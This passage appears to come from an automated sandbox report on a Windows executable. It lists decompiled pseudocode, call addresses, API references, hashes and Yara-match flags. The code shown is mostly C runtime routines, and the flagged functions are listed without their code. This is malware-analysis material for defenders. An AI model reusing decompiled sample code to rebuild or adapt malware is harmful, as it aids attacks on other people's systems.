				signed int _t186;
				signed int _t189;
				signed int _t192;
				signed int _t195;
				signed int _t198;
				signed int _t201;
				signed int _t204;
				signed int _t207;
				signed int _t210;
				signed int _t213;
				signed int _t216;
				signed int _t219;
				signed int _t222;
				signed int _t225;
				signed int _t228;
				signed int _t231;
				signed int _t234;
				signed int _t237;
				signed int _t240;
				signed int _t243;
				signed int _t246;
				signed int _t249;
				signed int _t252;
				signed int _t255;
				signed int _t258;
				signed int _t261;
				signed int _t264;
				signed int _t267;
				signed int _t270;
				signed int _t276;

				_t278 =  *(__eax + 0x42) & 0x0000ffff;
				_t279 =  *(__eax + 0x44) & 0x0000ffff;
				_v8 =  *(__eax + 0x42) & 0x0000ffff;
				_v12 =  *(__eax + 0x44) & 0x0000ffff;
				if(__esi != 0) {
					_v16 = _v16 & 0x00000000;
					_v20 = __eax;
					_t142 = E0040B476(_t279,  &_v20, 1, _t278, 0x31, __esi + 4);
					_t145 = E0040B476(_t279,  &_v20, 1, _v8, 0x32, __esi + 8);
					_t148 = E0040B476(_t279,  &_v20, 1, _v8, 0x33, __esi + 0xc);
					_t151 = E0040B476(_t279,  &_v20, 1, _v8, 0x34, __esi + 0x10);
					_t154 = E0040B476(_t279,  &_v20, 1, _v8, 0x35, __esi + 0x14);
					_t157 = E0040B476(_t279,  &_v20, 1, _v8, 0x36, __esi + 0x18);
					_t159 = E0040B476(_t279,  &_v20, 1, _v8, 0x37, __esi);
					_t162 = E0040B476(_t279,  &_v20, 1, _v8, 0x2a, __esi + 0x20);
					_t165 = E0040B476(_t279,  &_v20, 1, _v8, 0x2b, __esi + 0x24);
					_t168 = E0040B476(_t279,  &_v20, 1, _v8, 0x2c, __esi + 0x28);
					_t171 = E0040B476(_t279,  &_v20, 1, _v8, 0x2d, __esi + 0x2c);
					_t174 = E0040B476(_t279,  &_v20, 1, _v8, 0x2e, __esi + 0x30);
					_t177 = E0040B476(_t279,  &_v20, 1, _v8, 0x2f, __esi + 0x34);
					_t180 = E0040B476(_t279,  &_v20, 1, _v8, 0x30, __esi + 0x1c);
					_t183 = E0040B476(_t279,  &_v20, 1, _v8, 0x44, __esi + 0x38);
					_t186 = E0040B476(_t279,  &_v20, 1, _v8, 0x45, __esi + 0x3c);
					_t189 = E0040B476(_t279,  &_v20, 1, _v8, 0x46, __esi + 0x40);
					_t192 = E0040B476(_t279,  &_v20, 1, _v8, 0x47, __esi + 0x44);
					_t195 = E0040B476(_t279,  &_v20, 1, _v8, 0x48, __esi + 0x48);
					_t198 = E0040B476(_t279,  &_v20, 1, _v8, 0x49, __esi + 0x4c);
					_t201 = E0040B476(_t279,  &_v20, 1, _v8, 0x4a, __esi + 0x50);
					_t204 = E0040B476(_t279,  &_v20, 1, _v8, 0x4b, __esi + 0x54);
					_t207 = E0040B476(_t279,  &_v20, 1, _v8, 0x4c, __esi + 0x58);
					_t210 = E0040B476(_t279,  &_v20, 1, _v8, 0x4d, __esi + 0x5c);
					_t213 = E0040B476(_t279,  &_v20, 1, _v8, 0x4e, __esi + 0x60);
					_t216 = E0040B476(_t279,  &_v20, 1, _v8, 0x4f, __esi + 0x64);
					_t219 = E0040B476(_t279,  &_v20, 1, _v8, 0x38, __esi + 0x68);
					_t222 = E0040B476(_t279,  &_v20, 1, _v8, 0x39, __esi + 0x6c);
					_t225 = E0040B476(_t279,  &_v20, 1, _v8, 0x3a, __esi + 0x70);
					_t228 = E0040B476(_t279,  &_v20, 1, _v8, 0x3b, __esi + 0x74);
					_t231 = E0040B476(_t279,  &_v20, 1, _v8, 0x3c, __esi + 0x78);
					_t234 = E0040B476(_t279,  &_v20, 1, _v8, 0x3d, __esi + 0x7c);
					_t237 = E0040B476(_t279,  &_v20, 1, _v8, 0x3e, __esi + 0x80);
					_t240 = E0040B476(_t279,  &_v20, 1, _v8, 0x3f, __esi + 0x84);
					_t243 = E0040B476(_t279,  &_v20, 1, _v8, 0x40, __esi + 0x88);
					_t246 = E0040B476(_t279,  &_v20, 1, _v8, 0x41, __esi + 0x8c);
					_t249 = E0040B476(_t279,  &_v20, 1, _v8, 0x42, __esi + 0x90);
					_t252 = E0040B476(_t279,  &_v20, 1, _v8, 0x43, __esi + 0x94);
					_t255 = E0040B476(_t279,  &_v20, 1, _v8, 0x28, __esi + 0x98);
					_t258 = E0040B476(_t279,  &_v20, 1, _v8, 0x29, __esi + 0x9c);
					_t261 = E0040B476(_t279,  &_v20, 1, _v12, 0x1f, __esi + 0xa0);
					_t264 = E0040B476(_t279,  &_v20, 1, _v12, 0x20, __esi + 0xa4);
					_t267 = E0040B476(_t279,  &_v20, 1, _v12, 0x1003, __esi + 0xa8);
					_t276 = _v12;
					_t270 = E0040B476(_t279,  &_v20, 0, _t276, 0x1009, __esi + 0xb0);
					 *(__esi + 0xac) = _t276;
					return _t142 | _t145 | _t148 | _t151 | _t154 | _t157 | _t159 | _t162 | _t165 | _t168 | _t171 | _t174 | _t177 | _t180 | _t183 | _t186 | _t189 | _t192 | _t195 | _t198 | _t201 | _t204 | _t207 | _t210 | _t213 | _t216 | _t219 | _t222 | _t225 | _t228 | _t231 | _t234 | _t237 | _t240 | _t243 | _t246 | _t249 | _t252 | _t255 | _t258 | _t261 | _t264 | _t267 | _t270;
				} else {
					return __eax | 0xffffffff;
				}
			}




















































                                                                                      0x0040c76a
                                                                                      0x0040c76e
                                                                                      0x0040c772
                                                                                      0x0040c775
                                                                                      0x0040c77a
                                                                                      0x0040c781
                                                                                      0x0040c787
                                                                                      0x0040c799
                                                                                      0x0040c7ae
                                                                                      0x0040c7c3
                                                                                      0x0040c7d8
                                                                                      0x0040c7f0
                                                                                      0x0040c805
                                                                                      0x0040c817
                                                                                      0x0040c82c
                                                                                      0x0040c844
                                                                                      0x0040c859
                                                                                      0x0040c86e
                                                                                      0x0040c883
                                                                                      0x0040c89b
                                                                                      0x0040c8b0
                                                                                      0x0040c8c5
                                                                                      0x0040c8da
                                                                                      0x0040c8f2
                                                                                      0x0040c907
                                                                                      0x0040c91c
                                                                                      0x0040c931
                                                                                      0x0040c949
                                                                                      0x0040c95e
                                                                                      0x0040c973
                                                                                      0x0040c988
                                                                                      0x0040c9a0
                                                                                      0x0040c9b5
                                                                                      0x0040c9ca
                                                                                      0x0040c9df
                                                                                      0x0040c9f7
                                                                                      0x0040ca0c
                                                                                      0x0040ca21
                                                                                      0x0040ca36
                                                                                      0x0040ca51
                                                                                      0x0040ca69
                                                                                      0x0040ca81
                                                                                      0x0040ca99
                                                                                      0x0040cab4
                                                                                      0x0040cacc
                                                                                      0x0040cae4
                                                                                      0x0040cafc
                                                                                      0x0040cb17
                                                                                      0x0040cb2f
                                                                                      0x0040cb4a
                                                                                      0x0040cb5d
                                                                                      0x0040cb67
                                                                                      0x0040cb74
                                                                                      0x0040cb7c
                                                                                      0x0040c77c
                                                                                      0x0040c780
                                                                                      0x0040c780

                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ___getlocaleinfo
                                                                                      • String ID:
                                                                                      • API String ID: 1937885557-0
                                                                                      • Opcode ID: 9b77c6060859d49e4c24381219a53f6a143864f9a34af445c1ea4ad784b43f42
                                                                                      • Instruction ID: 3724fbcbc1c36c63ff45af41235c8df1d2c90ec33ff3f850299579e7c1f1a0b5
                                                                                      • Opcode Fuzzy Hash: 9b77c6060859d49e4c24381219a53f6a143864f9a34af445c1ea4ad784b43f42
                                                                                      • Instruction Fuzzy Hash: 37E1FFB294060DFEEB11DAE1CC81EFF77BEFB04348F01452AB655E2091EA74AB059764
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 008500D0, Relevance: 9.7, APIs: 6, Instructions: 732COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                      • Instruction ID: eaf62c6864914bc0e88ed60ec8a34ddc5c5bdf86f8541d77a3ba32b213cc6ee4
                                                                                      • Opcode Fuzzy Hash: 23169db7a410551c83385ddf708b4d7ef8baad74fa6175bf0d512237d1225d66
                                                                                      • Instruction Fuzzy Hash: 30525B71D00208DBDF10DFA8D885B9EBBB5FF1430AF148169E819E7251E731AA49CF96
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084E6E0, Relevance: 8.2, APIs: 5, Instructions: 735COMMON
                                                                                      Download Yara Rule
                                                                                      APIs
                                                                                      • _wcsstr.LIBCMT ref: 0084E72D
                                                                                      • _wcsstr.LIBCMT ref: 0084E756
                                                                                      • _memset.LIBCMT ref: 0084E784
                                                                                        • Part of subcall function 0088FC0C: std::exception::exception.LIBCMT ref: 0088FC1F
                                                                                        • Part of subcall function 0088FC0C: __CxxThrowException@8.LIBCMT ref: 0088FC34
                                                                                        • Part of subcall function 0088FC0C: std::exception::exception.LIBCMT ref: 0088FC4D
                                                                                        • Part of subcall function 0088FC0C: __CxxThrowException@8.LIBCMT ref: 0088FC62
                                                                                        • Part of subcall function 0088FC0C: std::regex_error::regex_error.LIBCPMT ref: 0088FC74
                                                                                        • Part of subcall function 0088FC0C: __CxxThrowException@8.LIBCMT ref: 0088FC82
                                                                                        • Part of subcall function 0088FC0C: std::exception::exception.LIBCMT ref: 0088FC9B
                                                                                        • Part of subcall function 0088FC0C: __CxxThrowException@8.LIBCMT ref: 0088FCB0
                                                                                      • _wcsstr.LIBCMT ref: 0084EA0C
                                                                                      • _memset.LIBCMT ref: 0084EE5C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Exception@8Throw$_wcsstrstd::exception::exception$_memset$std::regex_error::regex_error
                                                                                      • String ID:
                                                                                      • API String ID: 1338678108-0
                                                                                      • Opcode ID: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                      • Instruction ID: 8ab0e78bc566e003e482065998cfe3fa510432761bebee36e3d1f6137d85eb19
                                                                                      • Opcode Fuzzy Hash: b5098284881af2f016dff51b4d469be074dfe0eb5f9feb8c37e34c07e0411b24
                                                                                      • Instruction Fuzzy Hash: B752BD71A0021D9FDF24CF68C895BAEBBF1FF14304F1485A9E84AEB282D7719945CB91
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00405246, Relevance: 7.6, APIs: 5, Instructions: 58COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 85%
                                                                                      			E00405246(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
				intOrPtr _v0;
				void* _v804;
				intOrPtr _v808;
				intOrPtr _v812;
				intOrPtr _t6;
				intOrPtr _t12;
				intOrPtr _t13;
				long _t17;
				intOrPtr _t21;
				intOrPtr _t22;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr* _t31;
				void* _t34;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t22 = __ecx;
				_t21 = __ebx;
				_t6 = __eax;
				_t34 = _t22 -  *0x4ad2a8; // 0xb3b28348
				if(_t34 == 0) {
					asm("repe ret");
				}
				 *0x4b0098 = _t6;
				 *0x4b0094 = _t22;
				 *0x4b0090 = _t25;
				 *0x4b008c = _t21;
				 *0x4b0088 = _t27;
				 *0x4b0084 = _t26;
				 *0x4b00b0 = ss;
				 *0x4b00a4 = cs;
				 *0x4b0080 = ds;
				 *0x4b007c = es;
				 *0x4b0078 = fs;
				 *0x4b0074 = gs;
				asm("pushfd");
				_pop( *0x4b00a8);
				 *0x4b009c =  *_t31;
				 *0x4b00a0 = _v0;
				 *0x4b00ac =  &_a4;
				 *0x4affe8 = 0x10001;
				 *0x4aff9c =  *0x4b00a0;
				 *0x4aff90 = 0xc0000409;
				 *0x4aff94 = 1;
				_t12 =  *0x4ad2a8; // 0xb3b28348
				_v812 = _t12;
				_t13 =  *0x4ad2ac; // 0x4c4d7cb7
				_v808 = _t13;
				 *0x4affe0 = IsDebuggerPresent();
				_push(1);
				E0040890D(_t14);
				SetUnhandledExceptionFilter(0);
				_t17 = UnhandledExceptionFilter(0x4a834c);
				if( *0x4affe0 == 0) {
					_push(1);
					E0040890D(_t17);
				}
				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
			}


















                                                                                      0x00405246
                                                                                      0x00405246
                                                                                      0x00405246
                                                                                      0x00405246
                                                                                      0x00405246
                                                                                      0x00405246
                                                                                      0x00405246
                                                                                      0x0040524c
                                                                                      0x0040524e
                                                                                      0x0040524e
                                                                                      0x0040c667
                                                                                      0x0040c66c
                                                                                      0x0040c672
                                                                                      0x0040c678
                                                                                      0x0040c67e
                                                                                      0x0040c684
                                                                                      0x0040c68a
                                                                                      0x0040c691
                                                                                      0x0040c698
                                                                                      0x0040c69f
                                                                                      0x0040c6a6
                                                                                      0x0040c6ad
                                                                                      0x0040c6b4
                                                                                      0x0040c6b5
                                                                                      0x0040c6be
                                                                                      0x0040c6c6
                                                                                      0x0040c6ce
                                                                                      0x0040c6d9
                                                                                      0x0040c6e8
                                                                                      0x0040c6ed
                                                                                      0x0040c6f7
                                                                                      0x0040c701
                                                                                      0x0040c706
                                                                                      0x0040c70c
                                                                                      0x0040c711
                                                                                      0x0040c71d
                                                                                      0x0040c722
                                                                                      0x0040c724
                                                                                      0x0040c72c
                                                                                      0x0040c737
                                                                                      0x0040c744
                                                                                      0x0040c746
                                                                                      0x0040c748
                                                                                      0x0040c74d
                                                                                      0x0040c761

                                                                                      APIs
                                                                                      • IsDebuggerPresent.KERNEL32 ref: 0040C717
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0040C72C
                                                                                      • UnhandledExceptionFilter.KERNEL32(004A834C), ref: 0040C737
                                                                                      • GetCurrentProcess.KERNEL32(C0000409), ref: 0040C753
                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 0040C75A
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                      • String ID:
                                                                                      • API String ID: 2579439406-0
                                                                                      • Opcode ID: 1566059068d073d66ead22c173aef48cf515cf5e502cffe7051bf17601847ce4
                                                                                      • Instruction ID: 7dd4472b2f6a9c45cdcb576e82f25c5b1c4c1acbed28e8c61e302277d6a1954f
                                                                                      • Opcode Fuzzy Hash: 1566059068d073d66ead22c173aef48cf515cf5e502cffe7051bf17601847ce4
                                                                                      • Instruction Fuzzy Hash: 3D21CCB4804304DFD710EFA8FD89B463BA4FB1A316F50427AE609972A0E7B49985CF5D
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0084DBE0, Relevance: 6.7, APIs: 4, Instructions: 702COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                      • Instruction ID: 4afe30cc39bab55d9a017095da69e49b77183b3a1d9757eba5c10814733d9cf9
                                                                                      • Opcode Fuzzy Hash: e85d920e4c80818efeaee1da1ba528809e92032e84bc46f79e75b20126437919
                                                                                      • Instruction Fuzzy Hash: C0525B71E00219DFDB10DBA8C885FAEBBB4FF49304F148198E509EB291DB74AD45CBA1
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 00850B00, Relevance: 6.7, APIs: 4, Instructions: 660COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, Offset: 00840000, based on PE: false
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                      • Instruction ID: c8c9522d7c938098fa92c60d8f1ac8529af7a3be5aea936579ceedac19ca9f2a
                                                                                      • Opcode Fuzzy Hash: 37c666b43537968137d919f050b0984878a90477fb183cf48e642191e4cf2ccd
                                                                                      • Instruction Fuzzy Hash: 97427B70D00208DBDF14DFA8C899BDEB7B5FF14309F244169E815E7291EB31AA49CBA5
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ACAA, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040ACAA() {

				SetUnhandledExceptionFilter(E0040AC68);
				return 0;
			}



                                                                                      0x0040acaf
                                                                                      0x0040acb7

                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000AC68), ref: 0040ACAF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000001.00000002.302252171.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000001.00000002.302207503.0000000000400000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302729484.00000000004A7000.00000002.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302737176.00000000004AD000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302741741.00000000004AE000.00000008.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302746457.00000000004AF000.00000004.00020000.sdmp Download File
                                                                                      • Associated: 00000001.00000002.302751068.00000000004BA000.00000002.00020000.sdmp Download File
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: 9141c76b0f4b056276c5854003d2fa147da0abd41da8341e31c0c469b4800d0b
                                                                                      • Instruction ID: 53aac050c787c49ee5b991af35110d4926f2ae28c4831639beb7d85df25cb407
                                                                                      • Opcode Fuzzy Hash: 9141c76b0f4b056276c5854003d2fa147da0abd41da8341e31c0c469b4800d0b
                                                                                      • Instruction Fuzzy Hash: 4690026065D20047961097745C4D60529A06A89646B6644716002D4094DA644010961B
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      Function 0040ECEC, Relevance: .4, Instructions: 384COMMONCrypto
                                                                                      Download Yara Rule
                                                                                      C-Code - Quality: 100%
                                                                                      			E0040ECEC(void* __eax, void* __ecx) {
				void* _t196;
				signed int _t197;
				void* _t200;
				signed char _t206;
				signed char _t207;
				signed char _t208;
				signed char _t210;
				signed char _t211;
				signed int _t216;
				signed int _t316;
				void* _t319;
				void* _t321;
				void* _t323;
				void* _t325;
				void* _t327;
				void* _t330;
				void* _t332;
				void* _t334;
				void* _t337;
				void* _t339;
				void* _t341;
				void* _t344;
				void* _t346;
				void* _t348;
				void* _t351;
				void* _t353;
				void* _t355;
				void* _t358;
				void* _t360;
				void* _t362;

				_t200 = __ecx;
				_t196 = __eax;
				if( *((intOrPtr*)(__eax - 0x1f)) ==  *((intOrPtr*)(__ecx - 0x1f))) {
					_t316 = 0;
					L17:
					if(_t316 != 0) {
						goto L1;
					}
					_t206 =  *(_t196 - 0x1b);
					if(_t206 ==  *(_t200 - 0x1b)) {
						_t316 = 0;
						L28:
						if(_t316 != 0) {
							goto L1;
						}
						_t207 =  *(_t196 - 0x17);
						if(_t207 ==  *(_t200 - 0x17)) {
							_t316 = 0;
							L39:
							if(_t316 != 0) {
								goto L1;
							}
							_t208 =  *(_t196 - 0x13);
							if(_t208 ==  *(_t200 - 0x13)) {
								_t316 = 0;
								L50:
								if(_t316 != 0) {
									goto L1;
								}
								if( *(_t196 - 0xf) ==  *(_t200 - 0xf)) {
									_t316 = 0;
									L61:
									if(_t316 != 0) {
										goto L1;
									}
									_t210 =  *(_t196 - 0xb);
									if(_t210 ==  *(_t200 - 0xb)) {
										_t316 = 0;
										L72:
										if(_t316 != 0) {
											goto L1;
										}
										_t211 =  *(_t196 - 7);
										if(_t211 ==  *(_t200 - 7)) {
											_t316 = 0;
											L83:
											if(_t316 != 0) {
												goto L1;
											}
											_t319 = ( *(_t196 - 3) & 0x000000ff) - ( *(_t200 - 3) & 0x000000ff);
											if(_t319 == 0) {
												L5:
												_t321 = ( *(_t196 - 2) & 0x000000ff) - ( *(_t200 - 2) & 0x000000ff);
												if(_t321 == 0) {
													L3:
													_t197 = ( *(_t196 - 1) & 0x000000ff) - ( *(_t200 - 1) & 0x000000ff);
													if(_t197 != 0) {
														_t197 = (0 | _t197 > 0x00000000) + (0 | _t197 > 0x00000000) - 1;
													}
													L2:
													return _t197;
												}
												_t216 = (0 | _t321 > 0x00000000) + (0 | _t321 > 0x00000000) - 1;
												if(_t216 != 0) {
													L86:
													_t197 = _t216;
													goto L2;
												} else {
													goto L3;
												}
											}
											_t216 = (0 | _t319 > 0x00000000) + (0 | _t319 > 0x00000000) - 1;
											if(_t216 == 0) {
												goto L5;
											}
											goto L86;
										}
										_t323 = (_t211 & 0x000000ff) - ( *(_t200 - 7) & 0x000000ff);
										if(_t323 == 0) {
											L76:
											_t325 = ( *(_t196 - 6) & 0x000000ff) - ( *(_t200 - 6) & 0x000000ff);
											if(_t325 == 0) {
												L78:
												_t327 = ( *(_t196 - 5) & 0x000000ff) - ( *(_t200 - 5) & 0x000000ff);
												if(_t327 == 0) {
													L80:
													_t316 = ( *(_t196 - 4) & 0x000000ff) - ( *(_t200 - 4) & 0x000000ff);
													if(_t316 != 0) {
														_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
													}
													goto L83;
												}
												_t316 = (0 | _t327 > 0x00000000) + (0 | _t327 > 0x00000000) - 1;
												if(_t316 != 0) {
													goto L1;
												}
												goto L80;
											}
											_t316 = (0 | _t325 > 0x00000000) + (0 | _t325 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L78;
										}
										_t316 = (0 | _t323 > 0x00000000) + (0 | _t323 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L76;
									}
									_t330 = (_t210 & 0x000000ff) - ( *(_t200 - 0xb) & 0x000000ff);
									if(_t330 == 0) {
										L65:
										_t332 = ( *(_t196 - 0xa) & 0x000000ff) - ( *(_t200 - 0xa) & 0x000000ff);
										if(_t332 == 0) {
											L67:
											_t334 = ( *(_t196 - 9) & 0x000000ff) - ( *(_t200 - 9) & 0x000000ff);
											if(_t334 == 0) {
												L69:
												_t316 = ( *(_t196 - 8) & 0x000000ff) - ( *(_t200 - 8) & 0x000000ff);
												if(_t316 != 0) {
													_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
												}
												goto L72;
											}
											_t316 = (0 | _t334 > 0x00000000) + (0 | _t334 > 0x00000000) - 1;
											if(_t316 != 0) {
												goto L1;
											}
											goto L69;
										}
										_t316 = (0 | _t332 > 0x00000000) + (0 | _t332 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L67;
									}
									_t316 = (0 | _t330 > 0x00000000) + (0 | _t330 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L65;
								}
								_t337 = ( *(_t196 - 0xf) & 0x000000ff) - ( *(_t200 - 0xf) & 0x000000ff);
								if(_t337 == 0) {
									L54:
									_t339 = ( *(_t196 - 0xe) & 0x000000ff) - ( *(_t200 - 0xe) & 0x000000ff);
									if(_t339 == 0) {
										L56:
										_t341 = ( *(_t196 - 0xd) & 0x000000ff) - ( *(_t200 - 0xd) & 0x000000ff);
										if(_t341 == 0) {
											L58:
											_t316 = ( *(_t196 - 0xc) & 0x000000ff) - ( *(_t200 - 0xc) & 0x000000ff);
											if(_t316 != 0) {
												_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
											}
											goto L61;
										}
										_t316 = (0 | _t341 > 0x00000000) + (0 | _t341 > 0x00000000) - 1;
										if(_t316 != 0) {
											goto L1;
										}
										goto L58;
									}
									_t316 = (0 | _t339 > 0x00000000) + (0 | _t339 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L56;
								}
								_t316 = (0 | _t337 > 0x00000000) + (0 | _t337 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L54;
							}
							_t344 = (_t208 & 0x000000ff) - ( *(_t200 - 0x13) & 0x000000ff);
							if(_t344 == 0) {
								L43:
								_t346 = ( *(_t196 - 0x12) & 0x000000ff) - ( *(_t200 - 0x12) & 0x000000ff);
								if(_t346 == 0) {
									L45:
									_t348 = ( *(_t196 - 0x11) & 0x000000ff) - ( *(_t200 - 0x11) & 0x000000ff);
									if(_t348 == 0) {
										L47:
										_t316 = ( *(_t196 - 0x10) & 0x000000ff) - ( *(_t200 - 0x10) & 0x000000ff);
										if(_t316 != 0) {
											_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
										}
										goto L50;
									}
									_t316 = (0 | _t348 > 0x00000000) + (0 | _t348 > 0x00000000) - 1;
									if(_t316 != 0) {
										goto L1;
									}
									goto L47;
								}
								_t316 = (0 | _t346 > 0x00000000) + (0 | _t346 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L45;
							}
							_t316 = (0 | _t344 > 0x00000000) + (0 | _t344 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L43;
						}
						_t351 = (_t207 & 0x000000ff) - ( *(_t200 - 0x17) & 0x000000ff);
						if(_t351 == 0) {
							L32:
							_t353 = ( *(_t196 - 0x16) & 0x000000ff) - ( *(_t200 - 0x16) & 0x000000ff);
							if(_t353 == 0) {
								L34:
								_t355 = ( *(_t196 - 0x15) & 0x000000ff) - ( *(_t200 - 0x15) & 0x000000ff);
								if(_t355 == 0) {
									L36:
									_t316 = ( *(_t196 - 0x14) & 0x000000ff) - ( *(_t200 - 0x14) & 0x000000ff);
									if(_t316 != 0) {
										_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
									}
									goto L39;
								}
								_t316 = (0 | _t355 > 0x00000000) + (0 | _t355 > 0x00000000) - 1;
								if(_t316 != 0) {
									goto L1;
								}
								goto L36;
							}
							_t316 = (0 | _t353 > 0x00000000) + (0 | _t353 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L34;
						}
						_t316 = (0 | _t351 > 0x00000000) + (0 | _t351 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L32;
					}
					_t358 = (_t206 & 0x000000ff) - ( *(_t200 - 0x1b) & 0x000000ff);
					if(_t358 == 0) {
						L21:
						_t360 = ( *(_t196 - 0x1a) & 0x000000ff) - ( *(_t200 - 0x1a) & 0x000000ff);
						if(_t360 == 0) {
							L23:
							_t362 = ( *(_t196 - 0x19) & 0x000000ff) - ( *(_t200 - 0x19) & 0x000000ff);
							if(_t362 == 0) {
								L25:
								_t316 = ( *(_t196 - 0x18) & 0x000000ff) - ( *(_t200 - 0x18) & 0x000000ff);
								if(_t316 != 0) {
									_t316 = (0 | _t316 > 0x00000000) + (0 | _t316 > 0x00000000) - 1;
								}
								goto L28;
							}
							_t316 = (0 | _t362 > 0x00000000) + (0 | _t362 > 0x00000000) - 1;
							if(_t316 != 0) {
								goto L1;
							}
							goto L25;
						}
						_t316 = (0 | _t360 > 0x00000000) + (0 | _t360 > 0x00000000) - 1;
						if(_t316 != 0) {
							goto L1;
						}
						goto L23;
					}
					_t316 = (0 | _t358 > 0x00000000) + (0 | _t358 > 0x00000000) - 1;
					if(_t316 != 0) {
						goto L1;
					}
					goto L21;
				} else {
					__edx =  *(__ecx - 0x1f) & 0x000000ff;
					__esi =  *(__eax - 0x1f) & 0x000000ff;
